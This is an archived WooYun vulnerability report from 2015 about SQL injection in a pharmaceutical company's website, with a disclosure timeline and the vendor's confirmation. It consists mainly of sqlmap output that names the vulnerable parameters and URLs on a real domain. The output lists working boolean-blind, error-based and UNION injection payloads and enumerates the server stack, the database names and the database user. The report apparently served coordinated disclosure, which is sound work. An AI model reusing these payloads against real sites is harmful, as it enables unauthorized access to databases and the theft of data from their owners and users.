乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-24: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经确认,细节仅向厂商公开 2015-09-04: 细节向核心白帽子及相关领域专家公开 2015-09-14: 细节向普通白帽子公开 2015-09-24: 细节向实习白帽子公开 2015-10-09: 细节向公众公开
华润医药某站存在SQL注入漏洞
注入点:http://www.wandonganxin.cn/ImgList.aspx?fcol=005
---Parameter: t_FName (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTA0MTgyMjkyM2RkaLRvq18jFEnW2Qj30SVab8wJEig=&__EVENTVALIDATION=/wEWBALC9dGfBgLiiaaYCQLDuv0QAoznisYGnhRHW5BBspobDC8fi9Fkfy/Xweo=&t_FName=sWPU' AND 6458=CONVERT(INT,(SELECT CHAR(113) CHAR(113) CHAR(118) CHAR(98) CHAR(113) (SELECT (CASE WHEN (6458=6458) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(122) CHAR(113))) AND 'FLDt'='FLDt&t_FPWD=&Button1=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: __VIEWSTATE=/wEPDwUKMTA0MTgyMjkyM2RkaLRvq18jFEnW2Qj30SVab8wJEig=&__EVENTVALIDATION=/wEWBALC9dGfBgLiiaaYCQLDuv0QAoznisYGnhRHW5BBspobDC8fi9Fkfy/Xweo=&t_FName=sWPU' UNION ALL SELECT NULL,NULL,NULL,CHAR(113) CHAR(113) CHAR(118) CHAR(98) CHAR(113) CHAR(115) CHAR(110) CHAR(122) CHAR(89) CHAR(73) CHAR(118) CHAR(122) CHAR(104) CHAR(75) CHAR(104) CHAR(113) CHAR(112) CHAR(98) CHAR(122) CHAR(113)-- &t_FPWD=&Button1=%E7%99%BB %E5%BD%95---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection point(s) with a total of 36 HTTP(s) requests:---
---Parameter: fcol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fcol=004' AND 7653=7653 AND 'NlFN'='NlFN Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fcol=004' AND 6749=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6749=6749) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'dhiN'='dhiN---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [3]:[*] master[*] qds0470136_db[*] tempdbsqlmap identified the following injection point(s) with a total of 37 HTTP(s) requests:---Parameter: fcol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fcol=005' AND 7390=7390 AND 'UrFt'='UrFt Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fcol=005' AND 4554=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4554=4554) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(118)+CHAR(113))) AND 'igYv'='igYv---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user: 'qds0470136'
其他注入点一起送上:http://www.wandonganxin.cn/List.aspx?fcol=004
危害等级:高
漏洞Rank:15
确认时间:2015-08-25 11:30
感谢提交
暂无